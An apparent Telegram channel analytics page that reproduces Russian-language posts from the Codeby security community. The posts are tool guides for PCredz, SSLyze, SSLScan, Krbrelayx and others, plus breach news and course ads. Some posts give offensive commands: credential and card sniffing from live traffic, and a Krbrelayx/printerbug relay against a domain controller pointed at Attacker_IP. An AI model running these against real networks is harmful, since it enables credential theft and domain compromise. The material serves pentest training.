Codeby
Блог сообщества Кодебай Чат: @codeby_one Форум: codeby.net Обучение: codeby.academy CTF: hackerlab.pro VK: vk.com/codeby YT: clck.ru/XG99c Сотрудничество: @KinWiz Реклама: @Savchenkova_Valentina
Mostrar más📈 Análisis del canal de Telegram Codeby
El canal Codeby (@codeby_sec) en el segmento lingüístico de Ruso es un actor destacado. Actualmente la comunidad reúne a 36 562 suscriptores, ocupando la posición 3 760 en la categoría Tecnologías y Aplicaciones y el puesto 17 810 en la región Rusia.
📊 Métricas de audiencia y dinámica
Desde su creación el невідомо, el proyecto ha mostrado un crecimiento acelerado, reuniendo a 36 562 suscriptores.
Según los últimos datos del 06 junio, 2026, el canal mantiene una actividad estable. En los últimos 30 días la variación de miembros fue de 192, y en las últimas 24 horas de 6, conservando un alto alcance.
- Estado de verificación: No verificado
- Tasa de interacción (ER): El promedio de interacción de la audiencia es 7.76%. Durante las primeras 24 horas tras publicar, el contenido suele obtener 4.31% de reacciones respecto al total de suscriptores.
- Alcance de las publicaciones: Cada publicación recibe en promedio 2 836 visualizaciones. En el primer día suele acumular 1 576 visualizaciones.
- Reacciones e interacción: La audiencia responde de forma activa: el promedio de reacciones por publicación es 19.
- Intereses temáticos: El contenido se centra en temas clave como edr, api, вектор, mitre, att&ck.
📝 Descripción y política de contenido
El autor describe el recurso como un espacio para expresar opiniones subjetivas:
“Блог сообщества Кодебай
Чат: @codeby_one
Форум: codeby.net
Обучение: codeby.academy
CTF: hackerlab.pro
VK: vk.com/codeby
YT: clck.ru/XG99c
Сотрудничество: @KinWiz
Реклама: @Savchenkova_Valentina”
Gracias a la alta frecuencia de actualizaciones (últimos datos recibidos el 08 junio, 2026), el canal mantiene la vigencia y un amplio alcance. La analítica demuestra que la audiencia interactúa activamente con el contenido, lo que lo convierte en un punto de referencia dentro de la categoría Tecnologías y Aplicaciones.
Tracecat — открытая платформа автоматизации с ИИ для security и IT-команд: позволяет собирать workflows, оркестрировать алерты, вести кейсы и работать с таблицами в одном месте. Данный инструмент можно использовать как лёгкую, расширяемую альтернативу коммерческим SOAR/automation‑решениям.Основные возможности Tracecat 🛠 Workflows и оркестрация ➡️ No-code UI для визуальной сборки цепочек действий (API-запросы, webhooks, трансформации, AI‑шаги). ➡️ Ветвление, условия, циклы и выражения для работы с данными между шагами. 🔍 AI‑помощь в расследованиях ➡️ Обогащение и суммаризация алертов с помощью LLM, авто‑описания инцидентов. ➡️ Поиск похожих кейсов и рекомендация шагов расследования. 🗓️ Кейсы и таблицы ➡️ Встроенный case management: создание кейсов из workflows, статусы, таймлайн и артефакты. ➡️ Lookup‑таблицы и пользовательские таблицы для списков IP, пользователей и других справочных данных. ⬇️ Установка и запуск 1️⃣ Локально (Docker Compose) - Клонировать репозиторий и развернуть стек через docker-compose по инструкции из официальной документации. - После запуска UI доступен локально, где создаётся первый пользователь и рабочее пространство. 2️⃣ Прод на AWS Fargate - Использовать Terraform‑модуль для развёртывания прод‑стека на AWS Fargate. - Подходит для команд, которым нужны масштабируемость и интеграция с облачной инфраструктурой. #tools #ai #soar #automatization ➡ Все наши каналы 💬Все наши чаты ⚡ Для связи с менеджером
PCredz — лёгкая, но мощная утилита для извлечения учетных данных, хэшей и другой чувствительной информации из pcap-файлов или живого сетевого трафика. Инструмент активно используют пентестеры, DFIR-аналитики и исследователи сетевой безопасности благодаря удобству, скорости и широкой поддержке протоколов.⚡️ Основные возможности PCredz ➡️ Многопротокольный анализ Извлечение данных из IPv4 и IPv6 пакетов сразу по множеству протоколов: • NTLMv1/v2 (SMB, HTTP, LDAP, MSSQL и др.) • Kerberos AS-REQ Pre-Auth (etype 23) • HTTP Basic и формы авторизации • FTP, POP, SMTP, IMAP • SNMP community strings ➡️ Поиск кредитных карт в трафике Определяет и извлекает номера банковских карт, встречающиеся в сетевом потоке. ➡️ Хэши в формате для hashcat NTLMv1/v2 и Kerberos сохраняются в файлы, которые можно сразу отправлять в hashcat (режимы 5500, 5600, 7500). ➡️ Удобное логирование Все найденные данные сохраняются в CredentialDump-Session.log и в отдельные файлы (MSKerb.txt, NTLMv1.txt, NTLMv2.txt) в каталоге logs/. ⬇️ Установка и запуск 👩💻 Docker
git clone https://github.com/lgandx/PCredz
cd PCredz
docker build . -t pcredz
docker run --net=host -v $(pwd):/opt/Pcredz -it pcredz
👩💻 Linux
apt install python3-pip libpcap-dev file
pip3 install Cython python-libpcap
👩💻 Использование
⏺️ Разбор pcap-файла
python3 ./Pcredz -f capture.pcap
⏺️ Разбор всех pcap в каталоге
python3 ./Pcredz -d /tmp/pcaps/
⏺️ Живой захват трафика
python3 ./Pcredz -i eth0 -v
👩💻 Аргументы запуска
-f <file> Парсинг pcap-файла
-d <dir> Рекурсивный разбор каталога
-i <interface> Живой перехват трафика
-v Подробный вывод
-o <dir> Директория для логов
➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
#PCredz #Kerberos #Pentestgit clone https://github.com/6lackRaven/GhostEyes.git
cd GhostEyes
📌Использование:
Сканирование ARP:
python ghosteyes.py net -i <INTERFACE> --scan <IP> --output <JSON-FILE>
Поиск VLAN:
python ghosteyes.py net -i <INTERFACE> --vlan --duration 120
Сканирование поддоменов:
python ghosteyes.py web -u <DOMAIN> -s <WORDLIST> -T
➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
#GhostEyes #Разведка #Кибербезопасность #RedTeamSSLyze — это быстрый и мощный инструмент для сканирования SSL/TLS, написанный на Python. Он предназначен для автоматизированного анализа конфигураций серверов с целью проверки использования надежных криптографических настроек (сертификатов, наборов шифров) и выявления уязвимостей к известным атакам.🔤Возможности🔤 - Инструмент оптимизирован для надежного сканирования сотен тысяч серверов ежедневно - Позволяет встраивать проверки безопасности в процессы непрерывной интеграции и доставки - Поддерживает сканирование не только HTTP/HTTPS серверов, но и сервисов, использующих SMTP, XMPP, LDAP, POP, IMAP, RDP, Postgres, FTP - Результаты могут быть сохранены в структурированном JSON-формате для последующего анализа - Автоматическая проверка конфигурации сервера на соответствие рекомендуемым профилям безопасности (например, от Mozilla) ⏩Установка
sudo apt install sslyze
Проверка
sslyze -h
⏩Базовое сканирование одного хоста
python -m sslyze example.com
⏩Сканирование нескольких целей за один запуск
python -m sslyze example.com google.com:443 192.168.1.10:8443
⏩Сканирование списка целей из файла
Предварительно создайте файл targets.txt, где каждая новая строка содержит адрес хоста (с портом или без):
example.com
api.example.com:443
192.168.1.100:8443
Запустите сканирование
python -m sslyze --targets_in targets.txt
⏩Проверка на соответствие стандарту Mozilla Intermediate
python -m sslyze --mozilla_config=intermediate example.com
Инструмент выведет результат («OK - Supported» или «FAILED - Not supported») и вернет соответствующий код выхода (0 при успехе, не 0 при наличии проблем), что удобно для CI/CD
⏩Расширенная проверка с фокусировкой на конкретные уязвимости
python -m sslyze --heartbleed --robot --certinfo example.com
⏩Сохранение полного отчета о сканировании в JSON-файл
python -m sslyze --json_out=scan_results.json example.com
🔤Важные примечания🔤
- При использовании ключа --targets_in в файле должна быть указана одна цель (hostname или hostname:port) на строку. В командной строке цели перечисляются через пробел
- При использовании ключа --mozilla_config инструмент возвращает код 0, если сервер соответствует выбранному профилю, и код, отличный от 0, если соответствие не достигнуто. Это позволяет легко интегрировать проверку в скрипты автоматизации
- Для проблемных или медленных соединений можно использовать опцию --slow_connection, чтобы уменьшить количество параллельных запросов
➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджеромgit clone https://github.com/spyboy-productions/CloakQuest3r.git
cd CloakQuest3r
📌Запуск:
python cloakquest3r.py example.com
🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!
➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджеромShinyHunters — одна из самых известных киберпреступных группировок, специализирующихся на кражах и продаже баз данных, вымогательстве и массовых утечках персональных данных. Активны как минимум с 2020 года и за это время стали синонимом крупных data breach-инцидентов. Деятельность данной группировки связывают с утечками данных: Tokopedia, Wattpad, Pixlr, Wishbone, Mathway, HomeChef.Какие данные скомпрометированы По подтверждённой информации, в утечке присутствуют: 🟠 email-адреса пользователей 🟠 история просмотров 🟠 поисковые запросы 🟠 ссылки и названия видео 🟠 метаданные пользовательской активности Это не просто PII, а поведенческие данные, позволяющие точно восстановить цифровой профиль пользователя. 🔸Эксперты считают, что взлом мог произойти не через инфраструктуру Pornhub напрямую, а через сторонний аналитический сервис Mixpanel, с которым платформа сотрудничала до 2021 года. 🔸Pornhub сообщил о расследовании и рекомендовал пользователям сохранять бдительность. Но в реальности этот инцидент — ещё одно напоминание: если данные куда-то отправляются — значит, однажды они могут утечь 🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря! ➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером
git clone https://github.com/sharsil/mailcat.git
cd mailcat
pip3 install -r requirements.txt --break-system-packages
📌Запуск:
python3 mailcat.py <NICKNAME>
➖Запуск с tor:
python3 mailcat.py --tor <NICKNAME>
➖Запуск с proxy:
proxychains4 -q python3 mailcat.py <NICKNAME>
или
python3 mailcat.py <NICKNAME> --proxy http://127.0.0.1:8080
🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!
➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджеромSSLScan — это утилита командной строки, предназначенная для глубокого анализа конфигурации SSL/TLS на удаленных серверах. Его основная задача — проверка поддерживаемых протоколов, шифров и выявление устаревших или небезопасных настроек путем установки соединений с целевым хостом. В отличие от ручной проверки, SSLScan предоставляет структурированный и полный отчет о состоянии безопасности криптографических протоколов сервера.💛Возможности - Анализ всех поддерживаемых сервером шифров для различных версий протоколов (SSLv2, SSLv3, TLS 1.0-1.3) - Четкое выявление, какие версии SSL и TLS (включая TLS 1.3) активированы на сервере - Тестирование порядка предпочтения шифров со стороны сервера - Получение детальной информации о цепочке сертификатов, включая алгоритмы подписи, срок действия, соответствие имени хоста (SNI) и использование расширений, таких как OCSP Must-Staple - Проверка на наличие известных уязвимостей, включая Heartbleed (CVE-2014-0160), ROBOT, поддержку сжатия TLS (CRIME) и поддержку безопасного возобновления сессии (Secure Renegotiation) - Возможность сканирования виртуальных хостов, использующих SNI - Вывод в удобочитаемом виде или в формате XML/JSON для последующего анализа в автоматизированных системах 💛Установка
sudo apt install sslscan
Проверка
sslscan -h
💛Базовое сканирование хоста
sslscan example.com
Эта команда выполнит все основные проверки для домена example.com на стандартном порту 443
💛Сканирование с указанием порта
sslscan example.com:8443
Полезно для проверки нестандартных HTTPS-портов, часто используемых в API или внутренних сервисах
💛Проверка конкретной версии протокола (например, только TLS 1.2 и TLS 1.3)
sslscan --tls13 --tls12 example.com
💛Тестирование всех поддерживаемых шифров без проверки сертификата
sslscan --no-cipher-details --no-renegotiation --no-compression --no-fallback example.com
Опция --no-cipher-details ускоряет сканирование, пропуская детальный анализ каждого шифра
💛Сохранение отчета в формате XML
sslscan --xml=report.xml example.com
💛Недостатки
⁃ Однопоточная архитектура делает полное сканирование всех шифров крайне медленным
- Для полной функциональности требуется статическая сборка с отдельной версией OpenSSL, что увеличивает размер файла и усложняет поддержку
- Базовые форматы отчетов (XML/JSON) требуют дополнительной обработки; отсутствует API для автоматизации
🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!
➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджеромПосмотрим, как это происходит на практике. ⬆️Готовы использовать Python, чтобы ваш пентест стал быстрее и глубже? Сделайте себе профессиональный подарок. Запись на курс «Python для Пентестера» открыта до 25 декабря. 🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря! По всем вопросам пишите ⚡️ @Codeby_Academy ➡️ Все наши каналы 💬Все наши чаты
Krbrelayx — это набор инструментов на языке Python, разработанный для демонстрации и проверки уязвимостей, связанных с протоколом Kerberos и службой каталогов Active Directory. Основное внимание уделяется техникам спуфинга и ретрансляции, которые могут позволить злоумышленнику получить несанкционированный доступ или повысить привилегии в корпоративной среде.🟧Набор Krbrelayx состоит из нескольких инструментов, каждый из которых нацелен на конкретные векторы атаки в инфраструктуре Active Directory: - Основная функция набора — проведение атак, связанных с ретрансляцией запросов Kerberos, для несанкционированного доступа к сетевым ресурсам - Инструменты позволяют создавать поддельные службы для перехвата и использования Kerberos-билетов, таких как TGS (Ticket Granting Service) - Набор демонстрирует эксплуатацию особенностей протокола Kerberos, включая проблемы с проверкой подлинности и делегированием - Поддержка различных методов указания целей, включая использование файлов и прямых аргументов командной строки 🟧Установка
sudo apt install krbrelayx
Проверяем
krbrelayx -h
🟧Переходим в директорию проекта и устанавливаем зависимости
cd krbrelayx
pip install -r requirements.txt
🟧Атака с использованием утилиты printerbug и ретрансляции
1. Запуск инструмента ретрансляции на машине атакующего
krbrelayx -t ldap://dc02.domain.local # Он будет ожидать входящих соединений Kerberos и ретранслировать их на целевой сервер (например, файловый ресурс)
2. На другой консоли выполняется скрипт printerbug, который принуждает контроллер домена (dc01)
printerbug domain.local/dc01\$@dc01.domain.local Attacker_IP # Аутентифицироваться на указанном IP атакующего (Attacker_IP) под учетной записью компьютера dc01$
В результате хэш пароля учетной записи компьютера dc01$ может быть ретранслирован на сервер dc02, что потенциально позволит создать нового пользователя в домене с высокими привилегиями.
🟧Базовая команда для запуска слушателя и ретрансляции на указанный контроллер домена
krbrelayx -t ldap://dc01.corp.local -wh wpad.corp.local -wa 2
🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!
➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером
¡Ya disponible! Investigación de Telegram 2025 — los principales insights del año 
